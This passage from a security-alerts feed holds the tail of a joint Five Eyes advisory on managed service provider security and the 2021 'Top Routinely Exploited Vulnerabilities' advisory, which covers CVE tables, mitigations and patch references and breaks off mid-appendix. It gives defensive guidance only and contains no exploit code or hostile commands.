  • Customers should enable effective monitoring and logging of their systems. If customers choose to engage an MSP to perform monitoring and logging, they should ensure that their contractual arrangements require their MSP to:
    • Implement comprehensive security event management that enables appropriate monitoring and logging of provider-managed customer systems; 
    • Provide visibility—as specified in the contractual arrangement—to customers of logging activities, including provider's presence, activities, and connections to the customer networks (Note: customers should ensure that MSP accounts are properly monitored and audited.); and
    • Notify customer of confirmed or suspected security events and incidents occurring on the provider’s infrastructure and administrative networks, and send these to a security operations center (SOC) for analysis and triage. 
Enforce multifactor authentication (MFA). 

Organizations should secure remote access applications and enforce MFA where possible to harden the infrastructure that enables access to networks and systems.[9],[10] Note: Russian state-sponsored APT actors have recently demonstrated the ability to exploit default MFA protocols; organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios.[11

  • MSPs should recommend the adoption of MFA across all customer services and products. Note: MSPs should also implement MFA on all accounts that have access to customer environments and should treat those accounts as privileged.
  • Customers should ensure that their contractual arrangements mandate the use of MFA on the services and products they receive. Contracts should also require MFA to be enforced on all MSP accounts used to access customer environments.
Manage internal architecture risks and segregate internal networks. 

Organizations should understand their environment and segregate their networks. Identify, group, and isolate critical business systems and apply appropriate network security controls to them to reduce the impact of a compromise across the organization.[12],[13]

  • MSPs should review and verify all connections between internal systems, customer systems, and other networks. Segregate customer data sets (and services, where applicable) from each other—as well as from internal company networks—to limit the impact of a single vector of attack. Do not reuse admin credentials across multiple customers. 
  • Customers should review and verify all connections between internal systems, MSP systems, and other networks. Ensure management of identity providers and trusts between the different environments. Use a dedicated virtual private network (VPN) or alternative secure access method, to connect to MSP infrastructure and limit all network traffic to and from the MSP to that dedicated secure connection. Verify that the networks used for trust relationships with MSPs are suitably segregated from the rest of their networks. Ensure contractual agreements specify that MSPs will not reuse admin credentials across multiple customers.
Apply the principle of least privilege. 

Organizations should apply the principle of least privilege throughout their network environment and immediate update privileges upon changes in administrative roles. Use a tiering model for administrative accounts so that these accounts do not have any unnecessary access or privileges. Only use accounts with full privileges across an enterprise when strictly necessary and consider the use of time-based privileges to further restrict their use. Identify high-risk devices, services and users to minimize their accesses.[14]

  • MSPs should apply this principle to both internal and customer environments, avoiding default administrative privileges. 
  • Customers should ensure that their MSP applies this principle to both provider and customer network environments. Note: customers with contractual arrangements that provide them with administration of MSP accounts within their environment should ensure that the MSP accounts only have access to the services/resources being managed by the MSP.
Deprecate obsolete accounts and infrastructure. 

Both MSPs and customers should periodically review their internet attack surface and take steps to limit it, such as disabling user accounts when personnel transition.[15] (Note: although sharing accounts is not recommended, should an organization require this, passwords to shared account should be reset when personnel transition.) Organizations should also audit their network infrastructure—paying particular attention to those on the MSP-customer boundary—to identify and disable unused systems and services. Port scanning tools and automated system inventories can assist organizations in confirming the roles and responsibilities of systems.

  • Customers should be sure to disable MSP accounts that are no longer managing infrastructure. Note: disabling MSP accounts can be overlooked when a contract terminates.
Apply updates. 

Organizations should update software, including operating systems, applications, and firmware. Prioritize applying security updates to software containing known exploited vulnerabilities. Note: organizations should prioritize patching vulnerabilities included in CISA’s catalogue of known exploited vulnerabilities (KEV) as opposed to only those with high Common Vulnerability Scoring System (CVSS) scores that have not been exploited and may never be exploited.[16],[17],[18],[19]

  • MSPs should implement updates on internal networks as quickly as possible.
  • Customers should ensure that they understand their MSP's policy on software updates and request that comprehensive and timely updates are delivered as an ongoing service.
Backup systems and data. 

Organizations should regularly update and test backups—including “gold images” of critical systems in the event these need to be rebuilt (Note: organizations should base the frequency of backups on their recovery point objective [20]). Store backups separately and isolate them from network connections that could enable the spread of ransomware; many ransomware variants attempt to find and encrypt/delete accessible backups. Isolating backups enables restoration of systems/data to their previous state should they be encrypted with ransomware. Note: best practices include storing backups separately, such as on external media.[21],[22],[23

  • MSPs should regularly backup internal data as well as customer data (where contractually appropriate) and maintain offline backups encrypted with separate, offline encryption keys. Providers should encourage customers to create secure, offsite backups and exercise recovery capabilities.
  • Customers should ensure that their contractual arrangements include backup services that meet their resilience and disaster recovery requirements. Specifically, customers should require their MSP to implement a backup solution that automatically and continuously backs up critical data and system configurations and store backups in an easily retrievable location, e.g., a cloud-based solution or a location that is air-gapped from the organizational network.
Develop and exercise incident response and recovery plans. 

Incident response and recovery plans should include roles and responsibilities for all organizational stakeholders, including executives, technical leads, and procurement officers. Organizations should maintain up-to-date hard copies of plans to ensure responders can access them should the network be inaccessible (e.g., due to a ransomware attack).[24]

  • MSPs should develop and regularly exercise internal incident response and recovery plans and encourage customers to do the same.
  • Customers should ensure that their contractual arrangements include incident response and recovery plans that meet their resilience and disaster recovery requirements. Customers should ensure these plans are tested at regular intervals.
Understand and proactively manage supply chain risk. 

All organizations should proactively manage ICT supply chain risk across security, legal, and procurement groups, using risk assessments to identify and prioritize the allocation of resources.[25],[26]

  • MSPs should understand their own supply chain risk and manage the cascading risks it poses to customers.
  • Customers should understand the supply chain risk associated with their MSP, including risk associated with third-party vendors or subcontractors. Customers should also set clear network security expectations with their MSPs and understand the access their MSP has to their network and the data it houses. Each customer should ensure their contractual arrangements meet their specific security requirements and that their contract specifies whether the MSP or the customer owns specific responsibilities, such as hardening, detection, and incident response.[27]
Promote transparency. 

Both MSPs and their customers will benefit from contractual arrangements that clearly define responsibilities. 

  • MSPs, when negotiating the terms of a contract with their customer, should provide clear explanations of the services the customer is purchasing, services the customer is not purchasing, and all contingencies for incident response and recovery.
  • Customers should ensure that they have a thorough understanding of the security services their MSP is providing via the contractual arrangement and address any security requirements that fall outside the scope of the contract. Note: contracts should detail how and when MSPs notify the customer of an incident affecting the customer's environment.
Manage account authentication and authorization. 

All organizations should adhere to best practices for password and permission management. [28],[29],[30] Organizations should review logs for unexplained failed authentication attempts—failed authentication attempts directly following an account password change could indicate that the account had been compromised. Note: network defenders can proactively search for such "intrusion canaries" by reviewing logs after performing password changes—using off-network communications to inform users of the changes—across all sensitive accounts. (See the ACSC publication, Windows Event Logging and Forwarding as well as Microsoft's documentation, 4625(F): An account failed to log on, for additional guidance.) 

  • MSPs should verify that the customer restricts MSP account access to systems managed by the MSP.
  • Customers should ensure MSP accounts are not assigned to internal administrator groups; instead, restrict MSP accounts to systems managed by the MSP. Grant access and administrative permissions on a need-to-know basis, using the principle of least privilege. Verify, via audits, that MSP accounts are being used for appropriate purposes and activities, and that these accounts are disabled when not actively being used. 
Purpose

This advisory was developed by UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities in furtherance their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

Acknowledgements

The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities would like to thank Secureworks for their contributions to this CSA.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. NCSC-UK, ACSC, CCCS, NCSC-NZ, CISA, NSA, and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favouring.

Contact Information

United Kingdom organizations: report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973. Australian organizations: visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca. New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654. U.S. organizations: all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov

Resources

In addition to the guidance referenced above, see the following resources:

References

[1] State of the Market: The New Threat Landscape, Pushing MSP security to the next level (N-able) 
[2] Global targeting of enterprises via managed service providers (NCSC-UK)
[3] Guidance for MSPs and Small- and Mid-sized Businesses (CISA)
[4] Kaseya Ransomware Attack: Guidance for Affected MSPs and their Customers (CISA) 
[5] APTs Targeting IT Service Provider Customers (CISA)
[6] MSP Investigation Report (ACSC)
[7] How to Manage Your Security When Engaging a Managed Service Provider
[8] Supply Chain Cyber Security: In Safe Hands (NCSC-NZ)
[9] Multi-factor authentication for online services (NCSC-UK)
[10] Zero trust architecture design principles: MFA (NCSC-UK)
[11] Joint CISA-FBI CSA: Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default MFA Protocols and “PrintNightmare” Vulnerability
[12] Security architecture anti-patterns (NCSC-UK)
[13] Preventing Lateral Movement (NCSC-UK)
[14] Preventing Lateral Movement: Apply the principle of least privilege (NCSC-UK)
[15] Device Security Guidance: Obsolete products (NCSC-UK)
[16] Known Exploited Vulnerabilities Catalog (CISA)
[17] The problems with patching (NCSC-UK)
[18] Security principles for cross domain solutions: Patching (NCSC-UK)
[19] Joint CSA: 2021 Top Routinely Exploited Vulnerabilities
[20] Protecting Data from Ransomware and Other Data Loss Events: A Guide for Managed Service Providers to Conduct, Maintain, and Test Backup Files (NIST)
[21] Stop Ransomware website (CISA)
[22] Offline backups in an online world (NCSC-UK)
[23] Mitigating malware and ransomware attacks (NCSC-UK)
[24] Effective steps to cyber exercise creation (NCSC-UK)
[25] Supply chain security guidance (NCSC-UK)
[26] ICT Supply Chain Resource Library (CISA)
[27] Risk Considerations for Managed Service Provider Customers (CISA)
[28] Device Security Guidance: Enterprise authentication policy (NCSC-UK)
[29] Preventing Lateral Movement: Apply the principle of least privilege (NCSC-UK)
[30] Implementing Strong Authentication (CISA)

Appendix

This advisory's definition of MSPs aligns with the following definitions.

The definition of MSP from Gartner's Information Technology Glossary—which is also referenced by NIST in Improving Cybersecurity of Managed Service Providers—is:

A managed service provider (MSP) delivers services, such as network, application, infrastructure and security, via ongoing and regular support and active administration on customers’ premises, in their MSP’s data center (hosting), or in a third-party data center.

MSPs may deliver their own native services in conjunction with other providers’ services (for example, a security MSP providing sys admin on top of a third-party cloud IaaS). Pure-play MSPs focus on one vendor or technology, usually their own core offerings. Many MSPs include services from other types of providers. The term MSP traditionally was applied to infrastructure or device-centric types of services but has expanded to include any continuous, regular management, maintenance and support.

The United Kingdom's Department of Digital, Culture, Media, and Sport (DCMS) recently published the following definition of MSP, which includes examples: 

Managed Service Provider - A supplier that delivers a portfolio of IT services to business customers via ongoing support and active administration, all of which are typically underpinned by a Service Level Agreement. A Managed Service Provider may provide their own Managed Services or offer their own services in conjunction with other IT providers’ services. The Managed Services might include:

  • Cloud computing services (resale of cloud services, or an in-house public and private cloud services, built and provided by the Managed Service Providers)
  • Workplace services
  • Managed Network
  • Consulting
  • Security services
  • Outsourcing
  • Service Integration and Management
  • Software Resale
  • Software Engineering
  • Analytics and Artificial Intelligence (AI)
  • Business Continuity and Disaster Recovery services

The Managed Services might be delivered from customer premises, from customer data centres, from Managed Service Providers’ own data centres or from 3rd party facilities (co-location facilities, public cloud data centres or network Points of Presence (PoPs)).

Revisions
  • May 11, 2022: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-117A: 2021 Top Routinely Exploited Vulnerabilities

US-CERT Security Alerts - Wed, 04/27/2022 - 06:00
Original release date: April 27, 2022 | Last revised: April 28, 2022
Summary

This joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), and United Kingdom’s National Cyber Security Centre (NCSC-UK). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.

U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets. 

The cybersecurity authorities encourage organizations to apply the recommendations in the Mitigations section of this CSA. These mitigations include applying timely patches to systems and implementing a centralized patch management system to reduce the risk of compromise by malicious cyber actors.

Download the Joint Cybersecurity Advisory: 2021 top Routinely Exploited Vulnerabilities (pdf, 777kb).

Technical DetailsKey Findings

Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability’s disclosure, likely facilitating exploitation by a broader range of malicious actors.

To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities—some of which were also routinely exploited in 2020 or earlier. The exploitation of older vulnerabilities demonstrates the continued risk to organizations that fail to patch software in a timely manner or are using software that is no longer supported by a vendor.

Top 15 Routinely Exploited Vulnerabilities

Table 1 shows the top 15 vulnerabilities U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities observed malicious actors routinely exploiting in 2021, which include:

  • CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows a cyber actor to take full control over the system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Log4j is incorporated into thousands of products worldwide. This vulnerability was disclosed in December 2021; the rapid widespread exploitation of this vulnerability demonstrates the ability of malicious actors to quickly weaponize known vulnerabilities and target organizations before they patch.
  • CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065. These vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., “vulnerability chaining”) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers. Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network.
  • CVE-2021-34523, CVE-2021-34473, CVE-2021-31207. These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers. 
  • CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center, could enable an unauthenticated actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a POC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.

Three of the top 15 routinely exploited vulnerabilities were also routinely exploited in 2020: CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors.

Table 1: Top 15 Routinely Exploited Vulnerabilities in 2021

CVE

Vulnerability Name

Vendor and Product

Type

CVE-2021-44228

Log4Shell

Apache Log4j

Remote code execution (RCE)

CVE-2021-40539

 

Zoho ManageEngine AD SelfService Plus

RCE

CVE-2021-34523

ProxyShell

Microsoft Exchange Server

Elevation of privilege

CVE-2021-34473

ProxyShell

Microsoft Exchange Server

RCE

CVE-2021-31207

ProxyShell

Microsoft Exchange Server

Security feature bypass

CVE-2021-27065

ProxyLogon

Microsoft Exchange Server

RCE

CVE-2021-26858

ProxyLogon

Microsoft Exchange Server

RCE

CVE-2021-26857

ProxyLogon

Microsoft Exchange Server

RCE

CVE-2021-26855

ProxyLogon

Microsoft Exchange Server

RCE

CVE-2021-26084

 

 

Atlassian Confluence Server and Data Center

Arbitrary code execution

CVE-2021-21972

 

VMware vSphere Client

RCE

CVE-2020-1472

ZeroLogon

Microsoft Netlogon Remote Protocol (MS-NRPC)

Elevation of privilege

CVE-2020-0688

 

Microsoft Exchange Server

RCE

CVE-2019-11510

 

Pulse Secure Pulse Connect Secure

Arbitrary file reading

CVE-2018-13379

 

Fortinet FortiOS and FortiProxy

Path traversal

Additional Routinely Exploited Vulnerabilities

In addition to the 15 vulnerabilities listed in table 1, U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities identified vulnerabilities, listed in table 2, that were also routinely exploited by malicious cyber actors in 2021. 

These vulnerabilities include multiple vulnerabilities affecting internet-facing systems, including Accellion File Transfer Appliance (FTA), Windows Print Spooler, and Pulse Secure Pulse Connect Secure. Three of these vulnerabilities were also routinely exploited in 2020: CVE-2019-19781, CVE-2019-18935, and CVE-2017-11882.

Table 2: Additional Routinely Exploited Vulnerabilities in 2021

CVE

Vendor and Product

Type

CVE-2021-42237

Sitecore XP

RCE

CVE-2021-35464

ForgeRock OpenAM server

RCE

CVE-2021-27104

Accellion FTA

OS command execution

CVE-2021-27103

Accellion FTA

Server-side request forgery

CVE-2021-27102

Accellion FTA

OS command execution

CVE-2021-27101

Accellion FTA

SQL injection

CVE-2021-21985

VMware vCenter Server

RCE

CVE-2021-20038

SonicWall Secure Mobile Access (SMA)

RCE

CVE-2021-40444

Microsoft MSHTML

RCE

CVE-2021-34527

Microsoft Windows Print Spooler

RCE

CVE-2021-3156

Sudo

Privilege escalation

CVE-2021-27852

Checkbox Survey

Remote arbitrary code execution

CVE-2021-22893

Pulse Secure Pulse Connect Secure

Remote arbitrary code execution

CVE-2021-20016

SonicWall SSLVPN SMA100

Improper SQL command neutralization, allowing for credential access

CVE-2021-1675

Windows Print Spooler

RCE

CVE-2020-2509

QNAP QTS and QuTS hero

Remote arbitrary code execution

CVE-2019-19781

Citrix Application Delivery Controller (ADC) and Gateway

Arbitrary code execution

CVE-2019-18935

Progress Telerik UI for ASP.NET AJAX

Code execution

CVE-2018-0171

Cisco IOS Software and IOS XE Software

Remote arbitrary code execution

CVE-2017-11882

Microsoft Office

RCE

CVE-2017-0199

Microsoft Office

RCE

MitigationsVulnerability and Configuration Management
  • Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching known exploited vulnerabilities, especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. 
    • If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.
  • Use a centralized patch management system.
  • Replace end-of-life software, i.e., software that is no longer supported by the vendor. For example, Accellion FTA was retired in April 2021.
  • Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications—such as webmail, file storage, file sharing, and chat and other employee collaboration tools—for their customers. However, as MSPs and CSPs expand their client organization's attack surface and may introduce unanticipated risks, organizations should proactively collaborate with their MSPs and CSPs to jointly reduce that risk. For more information and guidance, see the following resources.
Identity and Access Management
  • Enforce multifactor authentication (MFA) for all users, without exception.
  • Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords. 
  • Regularly review, validate, or remove privileged accounts (annually at a minimum).
  • Configure access control under the concept of least privilege principle.
    • Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (non-administrative privileges).

Note: see CISA Capacity Enhancement Guide – Implementing Strong Authentication and ACSC guidance on Implementing Multi-Factor Authentication for more information on hardening authentication systems.

Protective Controls and Architecture 
  • Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices. 
    • Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.
    • Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.
    • Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).
  • Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks. 
  • Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware.
    • Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure your EDR, SIEM, vulnerability scanner etc., are reporting the same number of assets.
    • Monitor the environment for potentially unwanted programs.
  • Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business critical functions.
  • Implement application allowlisting. 
Resources Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, NSA, ACSC, CCCS, NZ NCSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

Purpose 

This document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

References

[1] CISA’s Apache Log4j Vulnerability Guidance

Appendix: Patch Information and Additional Resources for  Top Exploited Vulnerabilities

CVE

Vendor

Affected Products

Patch Information

Resources

CVE-2021-42237

Sitecore

Sitecore XP 7.5.0 - Sitecore XP 7.5.2

Sitecore XP 8.0.0 - Sitecore XP 8.2.7

Sitecore Security Bulletin SC2021-003-499266

ACSC Alert Active Exploitation of vulnerable Sitecore Experience Platform Content Management Systems

 

CVE-2021-35464

ForgeRock

Access Management (AM) 5.x, 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3

OpenAM 9.x, 10.x, 11.x, 12.x and 13.x

ForgeRock AM Security Advisory #202104

ACSC Advisory Active exploitation of ForgeRock Access Manager / OpenAM servers

CCCS ForgeRock Security Advisory

CVE-2021-27104

Accellion

FTA 9_12_370 and earlier

Accellion Press Release: Update to Recent FTA Security Incident

Joint CSA Exploitation of Accellion File Transfer Appliance

ACSC Alert Potential Accellion File Transfer Appliance compromise

 

 

CVE-2021-27103

FTA 9_12_411 and earlier

CVE-2021-27102

FTA versions 9_12_411 and earlier

CVE-2021-27101

FTA 9_12_370 and earlier

 

CVE-2021-21985

VMware

vCenter Server 7.0, 6.7, 6.5

Cloud Foundation (vCenter Server) 4.x and 3.x

VMware Advisory VMSA-2021-0010

CCCS VMware Security Advisory

CVE-2021-21972

VMware

vCenter Server 7.0, 6.7, 6.5

Cloud Foundation (vCenter Server) 4.x and 3.x

VMware Advisory VMSA-2021-0002

ACSC Alert VMware vCenter Server plugin remote code execution vulnerability

CCCS VMware Security Advisory

CCCS Alert APT Actors Target U.S. and Allied Networks - Update 1

CVE-2021-20038

SonicWall

SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv

SonicWall Security Advisory SNWLID-2021-0026

ACSC Alert Remote code execution vulnerability present in SonicWall SMA 100 series appliances

CCCS SonicWall Security Advisory

 

CVE-2021-44228

Apache

Log4j, all versions from 2.0-beta9 to 2.14.1

For other affected vendors and products, see CISA's GitHub repository.

Log4j: Apache Log4j Security Vulnerabilities

For additional information, see joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities

CISA webpage Apache Log4j Vulnerability Guidance

CCCS Active exploitation of Apache Log4j vulnerability - Update 7

CVE-2021-40539

Zoho ManageEngine

ADSelfService Plus version 6113 and prior

Zoho ManageEngine: ADSelfService Plus 6114 Security Fix Release

Joint CSA APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus

CCCS Zoho Security Advisory

CVE-2021-40444

Microsoft

Multiple Windows products; see Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444

Microsoft Security Update Guide: MSHTML Remote Code Execution Vulnerability, CVE-2021-40444

 

CVE-2021-34527

Microsoft

Multiple Windows products; see Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527

Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-34527

Joint CSA Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability

CCCS Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3

CVE-2021-34523

Microsoft

Microsoft Exchange Server 2013 Cumulative Update 23

Microsoft Exchange Server 2016 Cumulative Updates 19 and 20

Microsoft Exchange Server 2019 Cumulative Updates 8 and 9

Microsoft Security Update Guide: Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523

Joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities

ACSC Alert Microsoft Exchange ProxyShell Targeting in Australia

 

CVE-2021-34473

Microsoft

Multiple Exchange Server versions; see: Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473

Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473

CVE-2021-31207

Microsoft

Multiple Exchange Server versions; see Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207

Microsoft Update Guide: Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207

CVE-2021-3156

Sudo

Sudo before 1.9.5p2

Sudo Stable Release 1.9.5p2

 

CVE-2021-27852

Checkbox Survey

Checkbox Survey versions prior to 7

 

 

CVE-2021-27065

Microsoft Exchange Server

Multiple versions; see: Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065

Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065

CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities

ACSC Advisory Active exploitation of Vulnerable Microsoft Exchange servers

CCCS Alert Active Exploitation of Microsoft Exchange Vulnerabilities - Update 4

CVE-2021-26858

Microsoft

Exchange Server, multiple versions; see Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858

Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858

CVE-2021-26857

Microsoft

Exchange Server, multiple versions; see Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857

Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857

CVE-2021-26855

Microsoft

Exchange Server, multiple versions; see Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855

Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855

CVE-2021-26084

 

Jira Atlassian

Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.

Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084

ACSC Alert Remote code execution vulnerability present in certain versions of Atlassian Confluence

CCCS Atlassian Security Advisory

CVE-2021-22893

Pulse Secure

PCS 9.0R3/9.1R1 and Higher

Pulse Secure SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4

CCCS Alert  Active Exploitation of Pulse Connect Secure Vulnerabilities - Update 1

CVE-2021-20016

SonicWall

SMA 100 devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v)

SonicWall Security Advisory SNWLID-2021-0001

 

CVE-2021-1675

Microsoft

Multiple Windows products; see Microsoft Security Update Guide Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675

Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675

CCCS Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3

CVE-2020-2509

QNAP

QTS, multiple versions; see QNAP: Command Injection Vulnerability in QTS and QuTS hero

QuTS hero h4.5.1.1491 build 20201119 and later

QNAP: Command Injection Vulnerability in QTS and QuTS hero

 

CVE-2020-1472

Microsoft

Windows Server, multiple versions; see Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472

Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472

ACSC Alert Netlogon elevation of privilege vulnerability (CVE-2020-1472)

Joint CSA APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

CCCS Alert Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1

CVE-2020-0688

Microsoft

Exchange Server, multiple versions; see Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688

Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688

CISA Alert Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

Joint CSA Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology

CCCS Alert Microsoft Exchange Validation Key Remote Code Execution Vulnerability

CVE-2019-19781

Citrix

ADC and Gateway version 13.0 all supported builds before 13.0.47.24

NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12

SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b

Citrix Security Bulletin CTX267027

Joint CSA APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

CISA Alert Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

CCCS Alert Detecting Compromises relating to Citrix CVE-2019-19781

 

 

 

CVE-2019-18935

Progress Telerik

